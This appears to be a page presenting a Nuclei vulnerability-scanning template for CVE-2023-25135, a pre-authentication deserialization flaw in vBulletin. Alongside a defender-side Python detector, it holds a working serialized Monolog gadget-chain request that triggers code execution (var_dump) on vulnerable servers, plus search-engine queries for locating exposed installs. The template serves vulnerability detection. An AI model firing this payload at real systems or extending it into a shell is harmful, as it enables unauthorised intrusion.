vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
ID: CVE-2023-25135
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2023,vbulletin,rce
Description
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
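The following is an added example, not part of the template or of vBulletin. It is a defender-side check that decodes a form-encoded request body and reports any field carrying PHP serialized object tokens, the pattern this template's request places in user[searchprefs]. The function names, the sample bodies and the class name ExampleClass are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP serialize() object tokens: O:<len>:"Class":<count>:{ (C: for Serializable).
# A token must start the value or follow ';', '{' or '}'; an optional '+' before
# the length is tolerated because older PHP releases accepted it.
_OBJECT_TOKEN = re.compile(r'(?<![^;{}])[OC]:\+?\d+:"([^"]+)":\d+:\{')


def serialized_classes(value):
    """Class names referenced by object tokens in a PHP-serialized string."""
    return _OBJECT_TOKEN.findall(value)


def audit_form_body(body):
    """Map each form field to the class names found in its decoded value."""
    findings = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        classes = serialized_classes(value)
        if classes:
            findings[field] = classes
    return findings


def flag_requests(requests):
    """Return (path, field, classes) for every request body carrying objects."""
    return [(path, field, classes)
            for path, body in requests
            for field, classes in audit_form_body(body).items()]


# Constructed sample bodies (not captured traffic). ExampleClass is a placeholder.
BENIGN_BODY = ("user%5Busername%5D=alice&user%5Bsearchprefs%5D="
               "a%3A1%3A%7Bs%3A4%3A%22sort%22%3Bs%3A4%3A%22date%22%3B%7D")
SUSPECT_BODY = ("user%5Busername%5D=bob&user%5Bsearchprefs%5D="
                "a%3A1%3A%7Bi%3A0%3BO%3A12%3A%22ExampleClass%22%3A0%3A%7B%7D%7D")
SAMPLE_REQUESTS = [("/ajax/api/user/save", BENIGN_BODY),
                   ("/ajax/api/user/save", SUSPECT_BODY)]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print(hit)
```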
YAML Source
```yaml
id: CVE-2023-25135

info:
  name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
    - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25135
    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
    - https://github.com/netlas-io/netlas-dorks
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-25135
    cwe-id: CWE-502
    epss-score: 0.71557
    epss-percentile: 0.98058
    cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    shodan-query:
      - http.component:"vBulletin"
      - http.html:"powered by vbulletin"
      - http.component:"vbulletin"
      - http.title:"powered by vbulletin"
      - cpe:"cpe:2.3:a:vbulletin:vbulletin"
    fofa-query:
      - body="powered by vbulletin"
      - title="powered by vbulletin"
    google-query:
      - intext:"Powered By vBulletin"
      - intitle:"powered by vbulletin"
      - intext:"powered by vbulletin"
  tags: cve,cve2023,vbulletin,rce

http:
  - raw:
      - |
        POST /ajax/api/user/save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'string(14)'
          - '"CVE-2023-25135"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bad15f88a11d609952640995d7c83f4da3808e77d0dc933c18f7230f9695f465022100e17a405ebc53b08b446ed39ab0e3ea2b1140efac05b80208eaf32c08e59b60b1:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-25135.yaml"